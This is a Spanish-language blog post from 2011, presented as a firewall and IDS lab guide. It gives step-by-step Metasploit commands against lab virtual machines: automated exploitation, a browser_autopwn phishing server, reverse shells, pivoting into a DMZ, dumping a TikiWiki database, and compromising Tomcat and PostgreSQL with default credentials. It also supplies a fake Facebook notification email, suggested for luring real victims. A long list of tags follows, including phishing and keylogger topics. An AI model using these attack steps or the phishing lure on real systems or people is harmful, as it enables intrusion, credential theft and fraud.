“Una vulnerabilidad es tan limitada como tú quieras que sea”
En su computador encontrara 3 maquinas virtuales llamadas {1,2,3},corralas
1: backtrack(BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general)
2: Ubuntu server
3: Windows xp(Windows xp sp2)
Para backtrack dar start backtrak stream buffer (primera opción)
Ifconfig eth1 192.168.0.11 netmask 255.255.255.0
Luego escribir startx
Ubuntu server:
Escribir login :
User: msfadmin
Password: msfadmin
Escribir startx
Windows xp
No toca hacer nada
Primer ataque(firewall desactivado)
Para nuestro primer ataque vamos a utilizar el agente malicioso backtrack y Windows xp
Primero vamos a comprobar la eficiencia de nuestro firewall instalado por defecto
En backtrack abrimos una konsole y escribimos ping 192.168.0.120 y veremos que no nos permite hacer un ping
Luego nmap 192.168.0.120 para observar si podemos ver los puertos, pero efectivamente están todos filtrados.
Ir a backtrack->penetration->All ->Msfconsole
Ahí escribir db_driver sqlite3
db_create redes
db_connect redes
Eso lo hacemos para crear una base de datos y allí guardar todas las vulnerabilidades encontradas método llamado ( Vulnerability Assessment: análisis de puntos débiles o vulnerabilidades De carácter técnico realizado a un sistema, guardando estos puntos débiles en una base de datos).
Como este primer ataque se divide en dos , procedemos a desactivar el firewall de Windows xp
Inicio->panel de control->centro de seguridad->firewall de Windows->marcar la opción desactivado (no se recomienda)
Ahora en backtrack , ya tenemos lista nuestra base de datos (bolsa) y lo que haremos será hacer un análisis de footprinting para saber a qué tipo de sistema nos enfrentamos
Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos.
Escribir en una msfconsole
db_namp –PN –A 192.168.0.120
-PN : intenta identificar los servicios por los puertos abiertos en el sistema esto permite evaluar cada servicio de forma individual para intentar ubicar vulnerabilidades en los mismos.
-A: análisis completo para la identificación del sistema operativo
Luego escribir
Db_autopwn : script que permite realizar ataques múltiples basándose desde una base de datos
db_autopwn -t -p –e
Ahora revisamos las sesiones que se han creado
El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental que todo es cargado en la memoria del sistema sin crear ningún proceso adicional.
Sessions –l
Para elegir la sesión hacemos sessions –i 1 o 2
Creamos la Shell reverse
Shell
Si no podemos crearla damos escribimos exit y re elegimos la sesión
Primer ataque (firewall activado)
Lo que haremos en este tipo de ataque es hacer que la victima caiga en una trampa y por medio de esta crear una Shell reversa.
Ir a backtrack->penetration->All ->Msfconsole
Alli escribir : nmap 192.168.0.120
Como podemos ver no se ha podido establecer ping con la víctima , cualquier persona creería que esto es seguro , pero ya veremos que no lo es .
Ahora escribir :
Use server/browser_autopwn
Este es un exploit que nos permite crear un servidor cargado de script envenenado con esto crearemos la conexión remota.
Show options
Set LHOST 192.168.0.11 // esto quiere decir donde quedara alojado nuestro server
Set SRVHOST 192.168.0.11// con esto le decimos que haga la conexión a el mismo para que en vez de lanzar un ataque a un servidor se vuelva promiscuo y espere peticiones
Set SRVPORT 80 // indicamos el puerto de salida de nuestro servidor
Ahora escribir: run
Acá veremos que se acaba de crear nuestro servidor.
El siguiente paso es hacer que nuestra victima caiga ingresando a la pagina pishing .
Como?
En la vida real se podría hacer mediante un mensaje de notificación de facebook ,
Es tan sencillo como crear un mensaje nuevo desde nuestra cuenta de Hotmail.com allí darle en editar texto modo html
Y escribir los datos que faltan en las xxx y luego enviarlo
AMIGO_QUE_ENVIA_MENSAJE ha etiquetado una foto tuya en tu álbum.
Para ver las fotos, sigue el siguiente enlace:
http://www.facebook.com/n/?photo.php&pid=439128&op=1&view=all&subj=1101827805&id=1405875231&mid=a0d79cG41ac8eddG8ac16dG5
Gracias,
El equipo de Facebook
___
Este mensaje estaba destinado a PNOMBRE DE LA VICTIMA . Deseas controlar los mensajes de correo electrónicos que recibes de Facebook? Visita:
http://www.facebook.com/editaccount.php?notifications&md=cGhvdG9fdGFnO2Zyb209MTQwNTg3NTIzMTt1aWQ9MTQwNTg3NTIzMTtwaWQ9NDM5MTI4O3RvPTExMDE4Mjc4MDU=&mid=a0d79cG41ac8eddG8ac16dG5
Las oficinas de Facebook estan en 1601 S. California Ave., Palo Alto, CA94304.
En Windows xp abrimos el navegador y escribimos:
192.168.0.11/código
El código es el que sale de donde dice Using URL: 192.168.0.11/código
Escribimos sessions –l
Luego sessions –i número de la sesión
Podemos crear una Shell escribiendo “Shell”
COMPROMETIENDO UNA ARQUITECTURA DMZ
En la misma msfconsole escribir:
route
run get_local_subnets
run arp_scanner –r 192.168.0.1/24 // para saber que nodos están activos
Ahora pulsamos control+z para dejar nuestra sesión en background
Escribimos Y
Back
Route
route print
route add 192.168.0.22 255.255.255.0 1// añadimos nuestra nueva víctima que está dentro de la red comprometida
route print // verificamos que se haya creado la sesión
sessions –l
back // volvemos atrás para lanzar otro exploit
use auxiliary/scanner/portscan/tcp //exploit
lo que haremos será evaluar cuales puertos se encuentran abiertos
set PORTS 1-1000
set RHOSTS 192.168.0.22
run
connect -c 1 192.168.111.2 23// nos conectamos al puerto 23 por medio de la primera víctima que hace de puente
Atacando una base de datos dentro de la DMZ
Tiki CMS/Groupware o TikiWiki es un sistema de gestión de contenidos de índole colaborativa (CMS/Groupware) fácil de configurar y personalizar, diseñado para crear portales, sitios comunitarios, intranets y aplicaciones web en general.
Como ya sabemos que puertos tiene hacemos un
db_driver sqlite3
db_create a
db_connect a
db_nmap –NP –A 192.168.0.22
luego hacemos un db_services
y listo ahora damos
en esta sección atacaremos todas las vulnerabilidades encontradas y realizaremos el ataque vía tunneling 192.168.0.120
back
use auxiliary/admin/tikiwiki/tikidblib // atacaremos la base de datos que está en 192.168.0.22 que posee myql
set RHOST 192.168.229.129
exploit
ahora ya tenemos los datos de la base de datos
Abrimos otra konsole y escribimos mysql –u root –h 192.168.0.22 –proot
Atacando el servidor tomcat
Tomcat (también llamado Jakarta Tomcat o Apache Tomcat) funciona como un contenedor de servlets desarrollado bajo el proyecto Jakarta en la Apache Software Foundation. Tomcat implementa las especificaciones de los servlets y de JavaServer Pages (JSP) de Sun Microsystems.
En la msfconsole
use auxiliary/scanner/http/tomcat_mrg_login
set RHOSTS 192.168.0.22
set RPORT 8180
run
Cuando aparezca en verde es que encontró el login [+]
.. Aprovechando el user y el pass conseguimos otro exploit
En la msfconsole escribir
Back
use exploits/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RPORT 8180
set RHOST 192.168.0.22
control +z
sessions –l
Ataque PostgreSQL
En la misma msfconsole
Back
use auxiliary/scanner/ postgres/postgres_login
set RHOST 192.168.0.22
nos logramos loguear con
usuario y password: postgres.
Ahora que ya tenemos los datos nos interesa el el fichero de configuración de usuarios para después realizar un brute forcé hacia el ssh
Back
use auxiliary/admin/ postgres/postgres_readfile
set PASSWORD postgres
set RHOST 192.168.0.22
Por último hacemos un db_autopwn –t –e –p
miércoles, 19 de enero de 2011
Guía de laboratorio firewall e ids
Publicado por
00000000
en
8:31
Etiquetas: Guía de laboratorio firewall e ids, guia firewall, lab firewall
Suscribirse a:
Enviar comentarios (Atom)
.
Actualización automatica
Labels
- -Hacer una subrutina que retorne la primera vocal leída del teclado. (1)
- :-OOO (1)
- :o (1)
- [php] ; safe mode ; safe_mode = off ; End: (1)
- #*7337# (1)
- #*7337# el codigo de la muerte (1)
- 00000000 (19)
- 1. (1)
- 10 post diarios (1)
- 1000 visitas (1)
- 138 (1)
- 139 y 445 (1)
- 15 números y retorne en otro arreglo las posiciones que ocupan los números impares (1)
- 15 notas en un arreglo de 1D (1)
- 2^64 (1)
- 213.3.44.238 (1)
- 3.0 (1)
- a (1)
- acm vulnerable a xss (1)
- adsense-noreply-es(arroba)google.com (1)
- Aleph cero (1)
- Alternativas al uso de un antivirus (1)
- anidar proxy (1)
- animal clonado (1)
- animales clonados (1)
- años en c++ (2)
- archivos c++ (1)
- Autosurf gratis (1)
- Aviso Importante Caja Madrid (1)
- aviso/arroba/bancasantander.es (1)
- b (1)
- backtraking (1)
- baile Tunak Tunak (1)
- baile wow (1)
- bas y ram (1)
- bisiesto en c (1)
- bisiesto en c++ (1)
- black board easy (1)
- blackboard (2)
- buena escritura de reqeurimientos (1)
- burlar (1)
- burlar rapidshare (1)
- burlar yahoo (1)
- burro (1)
- busca en mi blog (1)
- buscador para c (1)
- buscador radical (1)
- buscar arhcvio en c++ (1)
- buscar en un blog (1)
- Busqueda de servicios rpc (1)
- busquedas dns (1)
- busquedas dns en windows (1)
- busquedas dns en linux (1)
- c (3)
- c++ (5)
- Caja Madrid (1)
- calculadora 26 opciones en c++ (1)
- calculadora con muchas opciones en c++ (1)
- calculadora en c++ (1)
- camaras ip (1)
- Cambiar contraseña en blackboard (1)
- Cambiar contraseña en blackboard facilmente (1)
- cerrando puertos 137 (1)
- cerrar 137 (1)
- cerrar 139 (1)
- cerrar 445 (1)
- chat c++ (1)
- cheat facebook (1)
- chiste geek (1)
- cifrado radical (1)
- clonacion (1)
- clonaning (1)
- clonar (1)
- clonar simcard (1)
- clonar tarjeta sim (1)
- cluster (1)
- clusterty (1)
- codigo Autosurf (1)
- codigo fuente de cambio de dinero para maquinas dispensadoras en c++ (1)
- codigo fuente en c++ (1)
- codigo spyware (2)
- codigo virut (1)
- cojer msn iniciado (1)
- colombia 1 venezuela 2 (1)
- colombia 2025 (1)
- comando baile wow (1)
- comandos aircrackcomandos (1)
- comandos matricez en sage (2)
- comandos sage (2)
- comandos snort (1)
- comandos suite (1)
- comnados sage (1)
- como hacer dinero con software libre realidad o ficcion? (1)
- como instalar eyeos en un host gratuito (1)
- como se hacen las canciones de daft punk (1)
- como ser parte de sun (1)
- comparar archivos en c++ (1)
- comparar binarios c++ (1)
- comparar c++ (1)
- complemento tor para opera (1)
- convertir programa en portable (2)
- Convertir videos y audio usando Super (1)
- cookie de DART (1)
- cosas de google (1)
- cosas que hay qeu saber de google (1)
- cosas raras de google (1)
- cosota lorena orozco (1)
- creador (1)
- creador del c++ (1)
- crear portables (1)
- criptosage (1)
- cuadrado magico (1)
- cuadrado magico en c++ (1)
- d (1)
- Dadas dos matrices A y B intercambiar los minimos de A con los maximos de B.cpp (1)
- Dado el vector T de tamao n. Si el tamao es par invertir los elementos de la mitad de los elementos.cpp (1)
- dance Tunak Tunak (1)
- danceTunak (1)
- derivadas (1)
- derivadas en batch (1)
- descargar virut (1)
- descubrir-historial (1)
- descubrir-historial.blogspot.com/ (1)
- dibujar rombo en c (1)
- dibujar rombo en c++ (1)
- división por restas sucesivas en c++ (1)
- Dj Tatanka Qlimax cancion (1)
- Dj Tatanka Qlimax que buena cancion XD (1)
- Dj Technoboy (1)
- Dj Technoboy - Qlimax (1)
- download (1)
- dummies (1)
- easy blackboard (1)
- ect..jeje (1)
- editar informacion en black board (1)
- Editar información personal en blackboard (1)
- ejemplos basicos en java (1)
- El Gran Hotel CANTOR Primera Parte (1)
- El Gran Hotel Cantor Segunda Parte (1)
- el mejor video lorena orozco (1)
- el nuevo buscador para tu disco duro c: (1)
- el primer perro clonado (1)
- eliminar c (1)
- eliminar un archivo de forma segura en c (1)
- Elogio a la Dificultad (1)
- encriptador 00000000 (1)
- encriptador radical (1)
- Enjoy (1)
- entrando a los cursos del blackboard suite (1)
- entrar a la plataforma black board (1)
- escritura de reqeurimientos (1)
- explorar de archivos en 3d para linux (1)
- explorar para linux (1)
- eyeos (1)
- eyeos beta (1)
- eyeOS el sistema operativo 2.0 (1)
- f (1)
- factorial en c++ (1)
- fecha en c (1)
- fecha en c++ (1)
- free cam (1)
- fuente de codigo (1)
- fuente en c++ (1)
- fumado (1)
- fumar (1)
- fumar es malo.down fumar (1)
- funciones basicas para manejar matricez en sage (1)
- funciones biginteger (1)
- funciones en c++ (1)
- funciones sage (1)
- funciones smf (1)
- furier c++ (1)
- g (1)
- gauss hp50g (1)
- gauss jordan en hp50g (1)
- gauss jordan hp50g (1)
- google (1)
- Guía de laboratorio firewall e ids (1)
- guia firewall (1)
- hacer ping n linux (1)
- haciendo pings con nmap en linux (1)
- hack black board easy (1)
- hacking (1)
- hacking acm (1)
- hacking rapidshare (1)
- hacking smf (1)
- herramientas libres batch (2)
- hola (1)
- hola mundo en java (1)
- Hotel Cantor (1)
- hoy te quiero bastante (1)
- hp vulnerable (1)
- HP-UX 11.0 ftpd exploit :S (1)
- http://82.107.162.217/database/index.html (1)
- http://beta.eyeos.info/ (1)
- http://criptosage.freevar.com/wordpress/ (1)
- http://descubrir-historial.blogspot.com/ (1)
- http://projecteuler.net (1)
- http://rwmms.rai.ir:82/red/laca.html (1)
- http://www.livecdlist.com/ (1)
- http://www.tidaholmsflygklubb.se/content.asp?ContentID=643 (1)
- i love cosita (1)
- identicacion con nmap (1)
- identificacion de servicios con nmap (1)
- index.php (1)
- index.php~ (1)
- instalar eyeos (1)
- Instalar un mini-servidor web en windows (1)
- intra (1)
- intranet (1)
- intranet de la nasa (1)
- invertir un número en c++ (1)
- java base (1)
- java en basico (1)
- javax (1)
- javeriana clusterty (1)
- jeje (1)
- John Withney (1)
- key en c++ (1)
- keyboard hack (1)
- keyboard spam (1)
- keylogger en c++ (1)
- keysito (1)
- la Caixa (1)
- la espada (1)
- la espada y la piedra (1)
- la media en java (1)
- la mediana en java (1)
- la moda en java (1)
- la multiplicatoria en java (1)
- la sumatoria en java (1)
- la vida segun quino (1)
- lab firewall (1)
- ley 1273 (1)
- life (1)
- linux en nmap (1)
- list of list c++ (1)
- lista dentro de una lista (1)
- listas de listas (1)
- Live CDs para pentesting (1)
- lorena orozco (1)
- Los de Linux no nos meamos en las manos (1)
- luego escriba las notas aprobatorias (1)
- mapa mental de buena escritura de requerimientos (1)
- master (1)
- matecom (1)
- math.h (1)
- matricula en c (1)
- matricula en c++ (1)
- matrix en sage (1)
- matriz en sage (1)
- mayusculas y minusculas c++ (1)
- menu en c++ (1)
- Merchandising (1)
- Metasploit Framework (1)
- Mi Desorden Tiende A Un Orden (1)
- mi escritorio (1)
- mi orden ;que desroden (1)
- mini-servidor windows (1)
- mochila backtraking (1)
- msrpc (1)
- multiplicacion con biginteger (1)
- multiplicación rusa en c++ (1)
- multiplicar numeros con biginteger (1)
- nasa (1)
- net (1)
- newbie (1)
- nmap linux (1)
- no eperes mas en rapidshare (1)
- no me carga eyeos (1)
- numeros muy grandes en c++ (1)
- online series (1)
- opera en tor (1)
- operator (1)
- orden dentro del caos (1)
- origen daft punk (1)
- Pagina Para Mandar Sms A toDo El Mundo GRATISS (1)
- paz (1)
- perezas (1)
- phising banco santander (1)
- php.ini (1)
- ping (1)
- ping en linux (1)
- pirateria (1)
- pirateria para dummies (1)
- pishing bancos (1)
- poema para el infinito (1)
- portabes (1)
- portabilizador (1)
- portable (1)
- problema 1 projecteuler . (1)
- programa para buscar en un blog (1)
- programacio (1)
- programacion (1)
- programacion trasmilenio (1)
- progreso (1)
- prometeus (1)
- Propagaciones batch (1)
- Propagaciones por ghost (1)
- proxys anidados (1)
- proyecto burro (1)
- proyecto trasmilenio (1)
- publicidad (1)
- publicidad + strobe (1)
- publicidad basada en intereses (1)
- Pude haber sido el rey del mundo pero me dio pereza levantarme de la cama (1)
- python y sage (1)
- que es (1)
- que es Aleph cero (1)
- Que esperar (1)
- que pasara en colombia en el año 2025 (1)
- r (1)
- radical (1)
- radical sage (1)
- radical virus (15)
- radicalvirus (1)
- raidcal virus (1)
- raiz digital de un numero (1)
- raiz digital en cc++ (1)
- raras (1)
- red (1)
- Requiem (1)
- Requiem for Star Wars (1)
- restar numeros con biginteger (1)
- robar msn (2)
- rombo en c (1)
- rombo en c++ (1)
- rpc (1)
- saber la version de wordpress desde el codigo fuente (1)
- sage (1)
- save msn (1)
- se busca publicidad (1)
- secure anonymous (1)
- secure anonymous by 0000000 (1)
- securi"arroba"lacaixa.es (1)
- seno en c++ (1)
- serial r-232 c++ (1)
- serie fibonacci en c++ (1)
- Series gratis online (1)
- servicios con nmap (1)
- servicios rpc (1)
- servicios rpc linux (1)
- sin estar falcultado para ello (1)
- Sistemas de Detección de intrusos y Snort. (1)
- situacion del sistema penal colombiano en relacion con los delitos de internet (1)
- smf (1)
- snort (1)
- software burro (1)
- Software Freedom Day (1)
- Software Freedom Day 2009 (1)
- Software Freedom Day 2009 Bogotá (1)
- software portable (1)
- solo para ti (1)
- spam (1)
- spyware en c (1)
- spyware en c++ (1)
- sub en vino 3.0 (1)
- suite aircrack (1)
- suma con biginteger (1)
- sumar dos vectores en c++ (1)
- sumar en c++ (1)
- sumar numeros con biginteger (1)
- sun (1)
- tad lista (2)
- Teclator (1)
- the save msn (1)
- the msn (1)
- the second life (1)
- tiempo rapidshare (1)
- tipo abstracto de datos (1)
- traductor c++ (1)
- traductor de idiomas en c++ (1)
- traductor para c++ (1)
- troyano virut (1)
- trucos Teclator (1)
- Tunak Tunak (1)
- un ingeniero de Microsoft (1)
- usb 3.0 (1)
- uso extensivo de figuras geométricas en 3D con z-buffer en c++ (1)
- vectores en c++ (1)
- videos lorena orozco (1)
- videotutos Metasploit Framework (1)
- vino 3.0 (1)
- virus (4)
- virus spam (1)
- virus virut (1)
- virus youtube (1)
- virut (1)
- vocales de minusculas a mayusculas c++ (1)
- Vulnerabilidad en múltiples cortafuegos personales (1)
- vulnerabilidades MSRPC (1)
- warning fumar (1)
- windows (1)
- wow dance (1)
- wtf (1)
- www.spirit.com/Network/net0303.html (1)
- xd (1)
- xorg.conf.mdm (1)
- yahoo (1)
- उसब virus (1)
- एलिमिनर वायरस दे ला उसब (1)
0 comentarios:
Publicar un comentario